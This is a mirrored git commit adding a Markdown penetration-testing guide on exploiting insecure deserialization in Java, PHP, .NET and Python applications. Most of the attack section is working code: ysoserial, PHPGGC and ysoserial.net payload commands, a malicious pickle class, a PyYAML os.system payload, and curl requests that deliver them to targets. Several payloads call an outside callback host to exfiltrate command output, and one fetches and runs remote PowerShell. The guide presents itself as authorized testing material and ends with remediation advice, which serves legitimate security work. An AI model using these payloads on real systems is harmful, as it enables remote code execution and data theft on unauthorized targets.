mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-07-16 20:55:17 +03:00
Initial commit - 611 cybersecurity skills across all subdomains
This commit is contained in:
@@ -0,0 +1,314 @@
|
||||
---
|
||||
name: exploiting-insecure-deserialization
|
||||
description: Identifying and exploiting insecure deserialization vulnerabilities in Java, PHP, Python, and .NET applications to achieve remote code execution during authorized penetration tests.
|
||||
domain: cybersecurity
|
||||
subdomain: web-application-security
|
||||
tags: [penetration-testing, deserialization, rce, owasp, web-security, ysoserial]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Exploiting Insecure Deserialization
|
||||
|
||||
## When to Use
|
||||
|
||||
- During authorized penetration tests when applications process serialized data (cookies, API parameters, message queues)
|
||||
- When identifying Java serialization markers (`ac ed 00 05` / `rO0AB`) in HTTP traffic
|
||||
- For testing PHP applications that use `unserialize()` on user-controlled input
|
||||
- When evaluating .NET applications using `BinaryFormatter`, `ObjectStateFormatter`, or `ViewState`
|
||||
- During security assessments of applications using pickle (Python), Marshal (Ruby), or YAML deserialization
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- **Authorization**: Written penetration testing agreement with RCE testing scope
|
||||
- **ysoserial**: Java deserialization exploit tool (`git clone https://github.com/frohoff/ysoserial.git`)
|
||||
- **ysoserial.net**: .NET deserialization exploit tool (`git clone https://github.com/pwntester/ysoserial.net.git`)
|
||||
- **PHPGGC**: PHP deserialization gadget chain generator (`git clone https://github.com/ambionics/phpggc.git`)
|
||||
- **Burp Suite Professional**: With Java Deserialization Scanner extension
|
||||
- **Java Runtime**: For running ysoserial
|
||||
- **Collaborator/interactsh**: For out-of-band confirmation of code execution
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Identify Serialized Data in Application Traffic
|
||||
|
||||
Detect serialized objects in HTTP parameters, cookies, and headers.
|
||||
|
||||
```bash
|
||||
# Java serialization markers
|
||||
# Binary: starts with 0xACED0005
|
||||
# Base64: starts with rO0AB
|
||||
# Gzip+Base64: starts with H4sIAAAAAAAA
|
||||
|
||||
# Search Burp proxy history for serialization signatures
|
||||
# In Burp: Proxy > HTTP History > Search > "rO0AB"
|
||||
|
||||
# Check cookies and parameters for Base64-encoded serialized data
|
||||
echo "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA..." | base64 -d | xxd | head
|
||||
|
||||
# PHP serialization format
|
||||
# Looks like: O:4:"User":2:{s:4:"name";s:5:"admin";s:4:"role";s:4:"user";}
|
||||
# a:2:{i:0;s:5:"hello";i:1;s:5:"world";}
|
||||
|
||||
# .NET ViewState
|
||||
# __VIEWSTATE parameter in ASP.NET forms
|
||||
# Starts with /wEP... (base64)
|
||||
|
||||
# Python pickle
|
||||
# Base64 encoded pickle objects in cookies or API parameters
|
||||
# Binary starts with 0x80 (protocol version)
|
||||
|
||||
# Common locations to check:
|
||||
# - Session cookies
|
||||
# - Hidden form fields (__VIEWSTATE, __EVENTVALIDATION)
|
||||
# - API request/response bodies
|
||||
# - WebSocket messages
|
||||
# - Message queue payloads (JMS, RabbitMQ, Redis)
|
||||
# - Cache entries (Memcached, Redis)
|
||||
```
|
||||
|
||||
### Step 2: Test Java Deserialization with ysoserial
|
||||
|
||||
Generate deserialization payloads for Java applications.
|
||||
|
||||
```bash
|
||||
# List available gadget chains
|
||||
java -jar ysoserial.jar 2>&1 | grep -E "^\s+\w"
|
||||
|
||||
# Generate DNS callback payload for detection (safest test)
|
||||
java -jar ysoserial.jar URLDNS "http://java-deser.abc123.oast.fun" | base64 -w0
|
||||
|
||||
# Test with Burp Collaborator
|
||||
# Replace serialized cookie/parameter with generated payload
|
||||
# Check Collaborator for DNS/HTTP callbacks
|
||||
|
||||
# Generate RCE payloads with common gadget chains
|
||||
# CommonsCollections (very common in Java apps)
|
||||
java -jar ysoserial.jar CommonsCollections1 "curl http://abc123.oast.fun/rce" | base64 -w0
|
||||
java -jar ysoserial.jar CommonsCollections5 "whoami" | base64 -w0
|
||||
java -jar ysoserial.jar CommonsCollections6 "id" | base64 -w0
|
||||
|
||||
# Spring Framework gadget
|
||||
java -jar ysoserial.jar Spring1 "curl http://abc123.oast.fun/spring" | base64 -w0
|
||||
|
||||
# Hibernate gadget
|
||||
java -jar ysoserial.jar Hibernate1 "curl http://abc123.oast.fun/hibernate" | base64 -w0
|
||||
|
||||
# Send payload via curl
|
||||
PAYLOAD=$(java -jar ysoserial.jar CommonsCollections5 "curl http://abc123.oast.fun/confirm" | base64 -w0)
|
||||
curl -s -X POST \
|
||||
-b "session=$PAYLOAD" \
|
||||
"https://target.example.com/dashboard"
|
||||
```
|
||||
|
||||
### Step 3: Test PHP Deserialization with PHPGGC
|
||||
|
||||
Generate PHP gadget chains for common frameworks.
|
||||
|
||||
```bash
|
||||
# List available PHP gadget chains
|
||||
./phpggc -l
|
||||
|
||||
# Generate payloads for common PHP frameworks
|
||||
# Laravel RCE
|
||||
./phpggc Laravel/RCE1 system "id" -b
|
||||
./phpggc Laravel/RCE5 system "whoami" -b
|
||||
|
||||
# Symfony RCE
|
||||
./phpggc Symfony/RCE4 exec "curl http://abc123.oast.fun/php-rce" -b
|
||||
|
||||
# WordPress (via Guzzle)
|
||||
./phpggc Guzzle/RCE1 system "id" -b
|
||||
|
||||
# Monolog RCE
|
||||
./phpggc Monolog/RCE1 system "id" -b
|
||||
|
||||
# Test by injecting into cookie or parameter
|
||||
PAYLOAD=$(./phpggc Laravel/RCE1 system "curl http://abc123.oast.fun/laravel" -b)
|
||||
curl -s -b "serialized_data=$PAYLOAD" \
|
||||
"https://target.example.com/dashboard"
|
||||
|
||||
# PHP object injection via manipulated serialized string
|
||||
# Original: O:4:"User":2:{s:4:"name";s:5:"admin";s:4:"role";s:4:"user";}
|
||||
# Modified: O:4:"User":2:{s:4:"name";s:5:"admin";s:4:"role";s:5:"admin";}
|
||||
|
||||
# Test for type juggling with PHP unserialize
|
||||
# Change string to integer: s:4:"role" -> i:1
|
||||
```
|
||||
|
||||
### Step 4: Test .NET Deserialization
|
||||
|
||||
Assess ViewState and other .NET serialization vectors.
|
||||
|
||||
```bash
|
||||
# Analyze .NET ViewState
|
||||
# Check if ViewState MAC is enabled
|
||||
# Unprotected ViewState starts with /wE and can be decoded
|
||||
|
||||
# Using ysoserial.net for .NET payloads
|
||||
# (Run on Windows or via Mono on Linux)
|
||||
./ysoserial.exe -g TypeConfuseDelegate -f ObjectStateFormatter \
|
||||
-c "curl http://abc123.oast.fun/dotnet-rce" -o base64
|
||||
|
||||
./ysoserial.exe -g TextFormattingRunProperties -f BinaryFormatter \
|
||||
-c "whoami" -o base64
|
||||
|
||||
# Test ViewState deserialization
|
||||
# If __VIEWSTATEMAC is disabled or machine key is known:
|
||||
./ysoserial.exe -g ActivitySurrogateSelector -f ObjectStateFormatter \
|
||||
-c "powershell -c IEX(curl http://abc123.oast.fun/ps)" -o base64
|
||||
|
||||
# Insert payload into __VIEWSTATE parameter and submit form
|
||||
|
||||
# Check for .NET remoting endpoints
|
||||
curl -s "https://target.example.com/remoting/service.rem"
|
||||
|
||||
# BinaryFormatter in API endpoints
|
||||
# Look for Content-Type: application/octet-stream
|
||||
# or application/x-msbin headers
|
||||
```
|
||||
|
||||
### Step 5: Test Python Pickle Deserialization
|
||||
|
||||
Exploit pickle-based deserialization in Python applications.
|
||||
|
||||
```python
|
||||
# Generate malicious pickle payload
|
||||
import pickle
|
||||
import base64
|
||||
import os
|
||||
|
||||
class Exploit:
|
||||
def __reduce__(self):
|
||||
return (os.system, ('curl http://abc123.oast.fun/pickle-rce',))
|
||||
|
||||
payload = base64.b64encode(pickle.dumps(Exploit())).decode()
|
||||
print(f"Pickle payload: {payload}")
|
||||
|
||||
# Alternative: Use pickletools for analysis
|
||||
import pickletools
|
||||
pickletools.dis(pickle.dumps(Exploit()))
|
||||
```
|
||||
|
||||
```bash
|
||||
# Send pickle payload
|
||||
PAYLOAD=$(python3 -c "
|
||||
import pickle, base64, os
|
||||
class E:
|
||||
def __reduce__(self):
|
||||
return (os.system, ('curl http://abc123.oast.fun/pickle',))
|
||||
print(base64.b64encode(pickle.dumps(E())).decode())
|
||||
")
|
||||
|
||||
curl -s -X POST \
|
||||
-H "Content-Type: application/octet-stream" \
|
||||
-d "$PAYLOAD" \
|
||||
"https://target.example.com/api/import"
|
||||
|
||||
# Check for YAML deserialization (PyYAML)
|
||||
# Payload: !!python/object/apply:os.system ['curl http://abc123.oast.fun/yaml']
|
||||
curl -s -X POST \
|
||||
-H "Content-Type: application/x-yaml" \
|
||||
-d "!!python/object/apply:os.system ['curl http://abc123.oast.fun/yaml']" \
|
||||
"https://target.example.com/api/config"
|
||||
```
|
||||
|
||||
### Step 6: Confirm Exploitation and Document Impact
|
||||
|
||||
Validate successful deserialization attacks and document the impact chain.
|
||||
|
||||
```bash
|
||||
# Confirm RCE with out-of-band callback
|
||||
# Check interactsh/Collaborator for:
|
||||
# 1. DNS resolution of your callback domain
|
||||
# 2. HTTP request with command output
|
||||
# 3. Timing-based confirmation (sleep commands)
|
||||
|
||||
# If blind, use timing-based confirmation
|
||||
# Java: Thread.sleep(10000)
|
||||
java -jar ysoserial.jar CommonsCollections5 "sleep 10" | base64 -w0
|
||||
# Measure if response takes ~10 seconds longer
|
||||
|
||||
# Exfiltrate system info (authorized testing only)
|
||||
java -jar ysoserial.jar CommonsCollections5 \
|
||||
"curl http://abc123.oast.fun/\$(whoami)" | base64 -w0
|
||||
|
||||
# Document the gadget chain and affected library versions
|
||||
# Check target classpath for vulnerable libraries:
|
||||
# - commons-collections 3.x / 4.0
|
||||
# - spring-core
|
||||
# - hibernate-core
|
||||
# - groovy
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Concept | Description |
|
||||
|---------|-------------|
|
||||
| **Serialization** | Converting an object into a byte stream for storage or transmission |
|
||||
| **Deserialization** | Reconstructing an object from a byte stream, potentially executing code |
|
||||
| **Gadget Chain** | A sequence of existing class methods chained together to achieve arbitrary code execution |
|
||||
| **Magic Methods** | Special methods called automatically during deserialization (`__wakeup`, `__destruct` in PHP, `readObject` in Java) |
|
||||
| **ViewState** | ASP.NET mechanism for persisting page state, often containing serialized objects |
|
||||
| **Pickle** | Python's native serialization format, inherently unsafe for untrusted data |
|
||||
| **URLDNS Gadget** | A Java gadget that triggers DNS lookup, useful for safe deserialization detection |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| **ysoserial** | Java deserialization payload generator with multiple gadget chains |
|
||||
| **ysoserial.net** | .NET deserialization payload generator |
|
||||
| **PHPGGC** | PHP Generic Gadget Chains for multiple frameworks |
|
||||
| **Burp Java Deserialization Scanner** | Automated detection of Java deserialization vulnerabilities |
|
||||
| **marshalsec** | Java unmarshaller exploitation for various libraries |
|
||||
| **Freddy (Burp Extension)** | Detects deserialization issues in multiple languages |
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario 1: Java Session Cookie RCE
|
||||
A Java application stores session data as serialized objects in cookies. The `rO0AB` prefix reveals Java serialization. Using ysoserial with CommonsCollections gadget chain achieves remote code execution.
|
||||
|
||||
### Scenario 2: PHP Laravel Unserialize
|
||||
A Laravel application passes serialized data through a hidden form field. Using PHPGGC to generate a Laravel RCE gadget chain achieves command execution when the form is submitted.
|
||||
|
||||
### Scenario 3: .NET ViewState Without MAC
|
||||
An ASP.NET application has ViewState MAC validation disabled. Using ysoserial.net to generate a malicious ViewState payload achieves code execution when the page processes the modified ViewState.
|
||||
|
||||
### Scenario 4: Python Pickle in Redis Cache
|
||||
A Python web application stores pickled objects in Redis for caching. By poisoning the cache with a malicious pickle payload, code execution is triggered when the application deserializes the cached object.
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
## Insecure Deserialization Finding
|
||||
|
||||
**Vulnerability**: Insecure Deserialization - Remote Code Execution
|
||||
**Severity**: Critical (CVSS 9.8)
|
||||
**Location**: Cookie `user_session` (Java serialized object)
|
||||
**OWASP Category**: A08:2021 - Software and Data Integrity Failures
|
||||
|
||||
### Reproduction Steps
|
||||
1. Capture the `user_session` cookie value (starts with rO0AB)
|
||||
2. Generate payload: java -jar ysoserial.jar CommonsCollections5 "id"
|
||||
3. Base64 encode and replace the cookie value
|
||||
4. Send request; command executes on the server
|
||||
|
||||
### Vulnerable Library
|
||||
- commons-collections 3.2.1 (CVE-2015-7501)
|
||||
- Java Runtime: OpenJDK 11.0.15
|
||||
|
||||
### Confirmed Impact
|
||||
- Remote Code Execution as `tomcat` user
|
||||
- Server OS: Ubuntu 22.04 LTS
|
||||
- Internal network access confirmed via reverse shell
|
||||
- Database credentials accessible from application config
|
||||
|
||||
### Recommendation
|
||||
1. Avoid deserializing untrusted data; use JSON or Protocol Buffers instead
|
||||
2. Upgrade commons-collections to 4.1+ (patched version)
|
||||
3. Implement deserialization filters (JEP 290 for Java 9+)
|
||||
4. Use allowlists for permitted classes during deserialization
|
||||
5. Implement integrity checks (HMAC) on serialized data before deserialization
|
||||
```
|
||||
Reference in New Issue
Block a user